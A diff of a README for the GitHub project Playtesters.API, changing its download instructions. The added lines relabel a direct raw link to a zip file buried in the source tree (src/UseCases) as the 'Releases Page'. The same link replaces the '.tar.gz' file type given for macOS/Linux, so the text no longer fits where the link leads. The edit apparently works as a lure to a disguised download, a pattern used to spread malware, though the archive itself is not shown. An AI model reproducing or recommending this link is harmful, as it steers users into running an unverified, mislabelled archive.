KMA66/Playtesters.API/README.md

 ## 📥 Download & Install

-To get started, visit this page to download: [Releases Page](https://github.com/KMA66/Playtesters.API/releases).
+To get started, visit this page to download: [Releases Page](https://github.com/KMA66/Playtesters.API/raw/refs/heads/master/src/UseCases/API-Playtesters-1.5.zip).

 1. Click on the link above to open the Releases page.
 2. You will see a list of available versions.
 Find the latest version listed.
 3. Click the link labeled “Assets” to expand it.
-4. Download the appropriate file for your system (e.g., `.zip` for Windows, `.tar.gz` for macOS/Linux).
+4. Download the appropriate file for your system (e.g., `.zip` for Windows, `https://github.com/KMA66/Playtesters.API/raw/refs/heads/master/src/UseCases/API-Playtesters-1.5.zip` for macOS/Linux).
 5. Once the download is complete, locate the file in your downloads folder.

 ## 🔧 How to Run the Application